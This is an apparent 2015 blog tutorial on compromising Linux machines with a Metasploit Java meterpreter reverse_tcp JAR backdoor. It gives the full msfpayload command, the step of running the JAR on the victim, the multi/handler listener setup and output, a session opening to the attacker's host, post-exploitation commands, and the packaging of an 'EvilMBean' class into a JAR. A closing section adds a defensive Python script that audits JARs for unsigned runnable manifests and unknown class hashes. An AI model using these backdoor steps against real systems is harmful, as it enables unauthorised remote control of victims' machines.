Saturday, February 21, 2015

Compromising machines running Linux using Metasploit JAR Backdoors

We can compromise a Windows machine using a malicious EXE file, generated with Metasploit, that acts as a backdoor. Machines running Linux can be compromised the same way using JAR backdoors.

Creating a JAR backdoor file using Metasploit msfpayload to hack a Linux box
root@kali-praveend-attacker:~# msfpayload java/meterpreter/reverse_tcp LHOST=1.1.1.32 LPORT=8888 R > compromise.jar
[!] ************************************************************************
[!] *               The utility msfpayload is deprecated!                  *
[!] *              It will be removed on or about 2015-06-08               *
[!] *                   Please use msfvenom instead                        *
[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *
[!] ************************************************************************

Execute the JAR file created above on the Linux box
praveen@victim:/tmp$ sudo java -jar compromise.jar

On Kali, run the commands below so that the victim connects back to the attacker when the JAR backdoor is executed
msf > use exploit/multi/handler
msf exploit(handler) > set payload java/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 1.1.1.32
LHOST => 1.1.1.32
msf exploit(handler) > set LPORT 8888
LPORT => 8888
msf exploit(handler) > exploit
msf exploit(handler) > show options
Module options (exploit/multi/handler):
   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
Payload options (java/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  1.1.1.32         yes       The listen address
   LPORT  8888             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Wildcard Target
msf exploit(handler) > exploit
[*] Started reverse handler on 1.1.1.32:8888
[*] Starting the payload handler...
[*] Sending stage (30355 bytes) to 1.1.1.40
[*] Meterpreter session 1 opened (1.1.1.32:8888 -> 1.1.1.40:33457) at 2015-02-15 17:49:04 -0500

Post-exploitation commands
meterpreter > sysinfo
Computer    : victim
OS          : Linux 3.13.0-32-generic (amd64)
Meterpreter : java/java
meterpreter > pwd
/tmp

Creating a JAR file from a class file
root@kali-ucs:~/rmx_remote# jar cvf compromise.jar EvilMBean.class
added manifest
adding: EvilMBean.class(in = 172) (out= 134)(deflated 22%)
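From the defender's side, a JAR like the ones built above (a manifest plus one or more class files) can be triaged before anyone runs it with `java -jar`. The following is an added example, not code from the original post: it reads the manifest, reports an unsigned JAR that declares a Main-Class, and flags every class whose SHA-256 is not in a known-good allowlist. The sample JAR, the EvilMBean class name reused from the post and the fake class bytes are constructed stand-ins.

```python
import hashlib
import io
import zipfile
def read_manifest(zf):
    """Parse the main section of META-INF/MANIFEST.MF into a dict."""
    attrs = {}
    try:
        text = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return attrs  # no manifest at all
    for line in text.splitlines():
        if not line.strip():
            break  # blank line ends the main section
        if ":" in line and not line.startswith(" "):
            key, value = line.split(":", 1)
            attrs[key.strip()] = value.strip()
    return attrs

def class_digests(jar_bytes):
    """Map every .class entry in the JAR to its SHA-256 hex digest."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        return {n: hashlib.sha256(zf.read(n)).hexdigest() for n in zf.namelist() if n.endswith(".class")}

def audit_jar(jar_bytes, known_good=frozenset()):
    """Flag an unsigned JAR with a Main-Class (runnable via `java -jar`) and classes not in the allowlist."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = zf.namelist()
        manifest = read_manifest(zf)
    # A signed JAR carries META-INF/*.SF plus a signature block (.RSA/.DSA/.EC).
    signed = any(n.startswith("META-INF/") and n.endswith((".SF", ".RSA", ".DSA", ".EC")) for n in names)
    findings = []
    main_class = manifest.get("Main-Class")
    if main_class and not signed:
        findings.append(f"unsigned runnable JAR, Main-Class={main_class}")
    for name, digest in class_digests(jar_bytes).items():
        if digest not in known_good:
            findings.append(f"unknown class {name} sha256={digest}")
    return findings

def build_sample_jar(main_class, class_name, class_bytes):
    """Constructed sample mimicking `jar cvf` output: a manifest plus one class."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\r\nMain-Class: {main_class}\r\n\r\n")
        zf.writestr(class_name, class_bytes)
    return buf.getvalue()

# Constructed stand-in: fake class bytes (magic number plus padding), not a real class.
SAMPLE_JAR = build_sample_jar("EvilMBean", "EvilMBean.class", b"\xca\xfe\xba\xbe" + b"\x00" * 28)
```

Run `audit_jar(open("some.jar", "rb").read(), known_good)` against an allowlist built from your own release artifacts; an unsigned runnable JAR dropped in /tmp with unknown classes is exactly the shape the post's backdoor takes.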